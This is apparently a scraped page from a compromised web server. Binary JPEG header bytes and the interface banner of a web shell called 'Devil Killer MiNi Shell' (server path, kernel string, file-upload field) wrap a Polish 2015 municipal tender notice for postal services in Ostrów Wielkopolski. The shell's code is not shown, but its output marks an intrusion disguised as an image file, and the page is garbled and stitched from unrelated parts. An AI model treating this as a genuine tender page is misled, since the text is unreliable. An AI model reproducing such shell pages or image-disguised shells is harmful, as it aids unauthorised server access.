JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151104/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151104/296966-N-2015.html

<p class="kh_header"><b>Ostrów Wielkopolski: Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla Urzędu Miejskiego w Ostrowie Wielkopolskim al. Powstańców  Wielkopolskich 18 w zakresie przyjmowania, sortowania, przemieszczania i doręczania przesyłek pocztowych oraz zwrotów przesyłek niedoręczonych, po wyczerpaniu możliwości ich doręczenia lub wydania odbioru</b><br>
<b>Numer ogłoszenia: 296966 - 2015; data zamieszczenia: 04.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Ostrów Wielkopolski , Aleja Powstańców Wielkopolskich 18, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 5822400, 7366241, faks 062 5918206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrow-wielkopolski.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla Urzędu Miejskiego w Ostrowie Wielkopolskim al. Powstańców  Wielkopolskich 18 w zakresie przyjmowania, sortowania, przemieszczania i doręczania przesyłek pocztowych oraz zwrotów przesyłek niedoręczonych, po wyczerpaniu możliwości ich doręczenia lub wydania odbioru.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla Urzędu Miejskiego w Ostrowie Wielkopolskim al. Powstańców  Wielkopolskich 18 w zakresie przyjmowania, sortowania, przemieszczania i doręczania przesyłek pocztowych oraz zwrotów przesyłek niedoręczonych, po wyczerpaniu możliwości ich doręczenia lub wydania odbioru.
I. Usługi będące przedmiotem zamówienia:
1) usługi pocztowe w obrocie krajowym i zagranicznym obejmujące przyjmowanie, sortowanie, przemieszczanie i doręczanie przesyłek pocztowych,
2) zwrot przesyłek niedoręczonych, po wyczerpaniu możliwości ich doręczenia lub wydania odbiorcy,
3) odbiór przez wykonawcę przesyłek pocztowych przeznaczonych do nadania 
z siedziby zamawiającego oraz ich przemieszczenie (przewóz) do placówki  nadawczej wykonawcy, z zastrzeżeniem, że gdy siedziba placówki nadawczej wykonawcy obsługująca zamawiającego będzie zlokalizowana w odległości do 100 m od siedziby zamawiającego, zamawiający będzie dostarczał we własnym zakresie przesyłki przeznaczone do nadania do placówki wykonawcy. 
II. Przez przesyłki pocztowe rozumie się:
   1) przesyłki listowe do 2000 g (gabaryt A i B - obrót krajowy)
      (strefa A,B,C,D - obrót zagraniczny)
a) zwykłe ekonomiczne -  przesyłki nierejestrowane nie będące przesyłkami najszybszej  kategorii (obrót krajowy i zagraniczny),
b) zwykłe priorytetowe - przesyłki nierejestrowane będące przesyłkami najszybszej kategorii (obrót krajowy i zagraniczny),
c) polecone ekonomiczne - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania (obrót krajowy),
d) polecone priorytetowe -  przesyłki rejestrowane najszybszej kategorii przyjęte za potwierdzeniem nadania (obrót krajowy i zagraniczny),
e) polecone ekonomiczne za zwrotnym potwierdzeniem odbioru - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru (obrót krajowy),
f) polecone priorytetowe za zwrotnym potwierdzeniem odbioru - przesyłki rejestrowane najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru (obrót krajowy i zagraniczny),
g) z zadeklarowaną wartością ekonomiczne - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości przesyłek podanej przez zamawiającego  (obrót krajowy), 
h) z zadeklarowana wartością priorytetowe - przesyłki rejestrowane  najszybszej  kategorii za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości przesyłek podanej przez zamawiającego (obrót krajowy i zagraniczny).
Gabaryt A to przesyłki listowe, których minimalne wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm, a maksymalne żaden z wymiarów nie może przekroczyć: wysokości  20 mm, długości 325 mm, szerokości 230 mm.
Gabaryt B to przesyłki listowe o wymiarach: minimum - jeżeli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 235 mm lub szerokość 230 mm a maksimum - suma długości, szerokości i wysokości nie może być większa 900 mm, przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm.
Strefa A - Europa (łącznie z Cyprem, cała Rosją i Izraelem)
Strefa B - Ameryka Północna i Afryka
Strefa C - Ameryka Południowa, Środkowa i Azja
Strefa D - Australia i Oceania
2) paczki pocztowe (przesyłki rejestrowane nie będące przesyłkami listowymi) do 10 kg obrót krajowy (gabaryt A i B)
a) ekonomiczne - rejestrowane nie będące paczkami najszybszej kategorii,
b) priorytetowe - rejestrowane będące paczkami najszybszej kategorii,
c) z zadeklarowaną wartością ekonomiczne - rejestrowane nie będące paczkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie. wykonawca ponosi odpowiedzialność do wysokości wartości paczek podanej przez zamawiającego,
d) z zadeklarowaną wartością priorytetowe - rejestrowane będące paczkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości paczek podanej przez zamawiającego 
Gabaryt A to paczki pocztowe, których minimalne wymiary strony adresowej nie mogą być mniejsze niż 90 mm x 140 mm, a maksymalne - żaden z wymiarów nie może przekroczyć: długość 600 mm, szerokość 500 mm, wysokość 300 mm
Gabaryt B to paczki pocztowe o wymiarach: minimum, jeżeli choć jeden z wymiarów przekracza długość 600 mm, szerokość 500 mm, wysokość 300 mm, maksimum - suma długości i największego obwodu mierzonego w innym kierunku niż długość wynosi 3000 mm, przy czym największy wymiar nie może przekroczyć 1500 mm
3) paczki pocztowe (przesyłki rejestrowane nie będące przesyłkami listowym) do 20 kg obrót zagraniczny ( strefa A, B, C, D) 
a) ekonomiczne - rejestrowane  nie będące paczkami najszybszej kategorii,
b) priorytetowe - rejestrowane będące paczkami najszybszej kategorii,
c) z zadeklarowaną wartością ekonomiczne - rejestrowane nie będące paczkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości paczek podanej przez zamawiającego, 
d) z zadeklarowaną wartością priorytetowe - rejestrowane będące paczkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości paczek podanej przez zamawiającego 
Strefa A -  Europa (łącznie z Cyprem, cała Rosją i Izraelem)
Strefa B - Ameryka Północna i Afryka
Strefa C - Ameryka Południowa, Środkowa i Azja
Strefa D - Australia i Oceania
W przypadku korzystania z usługi - paczka pocztowa (obrót krajowy i zagraniczny) zamawiający będzie korzystał również z dodatkowej usługi - potwierdzenia odbioru.
4) druki  bezadresowe  (obrót krajowy) - nieopatrzone oznaczeniem adresata i adresem informacje pisemne lub graficzne 
5) przesyłki  kurierskie do 20 kg  (obrót  krajowy i zagraniczny) - przesyłki listowe będące przesyłkami rejestrowanymi lub paczki pocztowe przyjmowane, sortowane, przemieszczane i doręczane w sposób łącznie zapewniający:
a) bezpośredni odbiór przesyłki pocztowej od zamawiającego,
b) śledzenie przesyłki pocztowej od momentu nadania do doręczenia,
c) doręczenie przesyłki pocztowej w gwarantowanym terminie, 
d) doręczenie przesyłki pocztowej do rąk adresata lub osoby uprawnionej do odbioru,
e) uzyskanie pokwitowania odbioru przesyłki pocztowej.
III. Zamawiający wymaga, aby przesyłki kurierskie  w obrocie krajowym były doręczane w trzech terminach:
a) zwykłym - w przypadku przesyłek adresowanych do osób fizycznych przesyłka, której gwarantowany termin doręczenia wynosi nie dłużej niż do godz. 20.00 następnego dnia roboczego po dniu nadania, w przypadku przesyłek adresowanych do firm, instytucji i urzędów gwarantowany termin doręczenia w godzinach ich urzędowania następnego dnia roboczego po dniu nadania,
b) południowym - przesyłka, której termin doręczenia wynosi nie dłużej niż do godz. 12.00 następnego dnia roboczego po dniu nadania, 
c) porannym - przesyłka, której termin doręczenia wynosi nie dłużej niż do godz. 9.00 następnego dnia roboczego po dniu nadania.
IV. Dodatkowe usługi, które musi zapewnić wykonawca realizując usługę przesyłki kurierskie w obrocie krajowym:
a) potwierdzenie odbioru,
b) doręczenie do rąk własnych. 
V. Inne wymagania:
1) Zamawiający zastrzega sobie możliwość korzystania z innych dodatkowych usług dotyczących przesyłek kurierskich nie wymienionych powyżej, a zawartych w cenniku wykonawcy.
2) Zamawiający oświadcza, że przewiduje do nadania u operatora wyznaczonego ok. 5 procent przesyłek z ogólnej liczby przesyłek rejestrowanych (z wyłączeniem przesyłek z zadeklarowaną wartością oraz przesyłek kurierskich). Zamawiający zastrzega jednak, że jest to ilość szacunkowa, która może ulec zwiększeniu lub zmniejszeniu w zależności od potrzeb zamawiającego.
3) Zamawiający dopuszcza sytuację, w której wykonawca nie będący operatorem wyznaczonym odbiera przesyłki pocztowe od zamawiającego (dot. wyodrębnionej grupy przesyłek) i przekazuje je do nadania w placówce operatora wyznaczonego. Celem zachowania terminów przesyłki odebrane od zamawiającego w danym dniu muszą być w tym samym dniu nadane. Wykonawca nie będący operatorem wyznaczonym będzie nadawał przesyłki pocztowe w placówce operatora wyznaczonego w imieniu zamawiającego, ale na koszt własny. Na kopertach przesyłek pocztowych znajdować się będą znaki opłaty operatora wyznaczonego, a nie wykonawcy, któremu zamawiający udzielił zamówienia. Na dowodzie nadania wystawianym przez operatora wyznaczonego widnieć będą dane zamawiającego jako nadawcy przesyłki. Dowód ten będzie przekazywany  zamawiającemu na drugi dzień roboczy od dnia nadania. Na wszystkich  przesyłkach jako nadawca widnieć będzie wyłącznie zamawiający. Wynagrodzenie wykonawcy będzie rozliczane na podstawie potwierdzeń przekazania przesyłek do nadania wystawianych przez operatora wyznaczonego. Zamawiający  informuje, że będzie pokrywał wyłącznie koszty opłaty pocztowej za nadanie przesyłek za pośrednictwem operatora wyznaczonego w wysokości wynikającej z formularza ofertowego wykonawcy. Wykonawca pokrywa wszelkie ewentualne dodatkowe  koszty,  związane  z  nadaniem   przesyłki  w placówce  operatora   wyznaczonego. W sytuacji zwrotu niedoręczonej przesyłki nadanej u operatora wyznaczonego zamawiający uiści na rzecz operatora wyznaczonego należną opłatę. Wykonawca umniejszy należność na fakturze obciążającej zamawiającego w kolejnym okresie rozliczeniowym o kwotę uiszczoną przez zmawiającego w danym miesiącu na rzecz operatora wyznaczonego z tytułu zwrotu przesyłek. Rozliczenie z wykonawcą należności za przesyłki zwrócone przez operatora wyznaczonego będzie dokonywane w oparciu o miesięczne zestawienie sporządzone przez zamawiającego na podstawie dowodów zapłaty (dowodów księgowych) za przesyłki zwrócone. Zgłoszenie powyższego zestawienia wykonawcy winno być dokonane przez zamawiającego nie później niż w terminie do 7 dni kalendarzowych po zakończeniu każdego miesiąca. 
4) Istotne zapisy, które odpowiednio zredagowane należy wprowadzić do umowy, zawarte są w załączniku pod nazwą Istotne postanowienia umowy (załącznik nr 8 do SIWZ). Zgodnie z pkt 17.1. SIWZ, w terminie 5 dni od daty wyboru oferty najkorzystniejszej wykonawca zobowiązany będzie przedłożyć do akceptacji projektu umowy zawierającego wszystkie zapisy z załącznika nr 8 do SIWZ).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie 
z wolnej ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy, jeżeli zamówienie uzupełniające dotyczy usług realizowanych w zamówieniu podstawowym</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert wykonawca wnosi wadium w wysokości
3.800,00 zł (słownie: trzy tysiące osiemset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że jest wpisany do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu  Komunikacji Elektronicznej zgodnie z art. 6 ust. 1 ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz. U. z 2012 r., poz. 1529 ze zmianami) w zakresie uprawniającym do wykonania zamówienia.
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia oraz zaświadczenia 
o wpisie do rejestru, o których mowa w pkt 7.1. i 7.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie wykonywał bądź wykonuje co najmniej dwie usługi, rozumiane jako dwie umowy, w zakresie przyjmowania, sortowania, przemieszczania i doręczania przesyłek pocztowych w obrocie krajowym 
i zagranicznym o wartości minimum 150.000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych) brutto każda.
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonych wraz z ofertą oświadczenia, wykazu i dokumentów, o których mowa w pkt 7.1. i 7.3. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa
w pkt 7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa
w pkt 7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa
w pkt 7.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
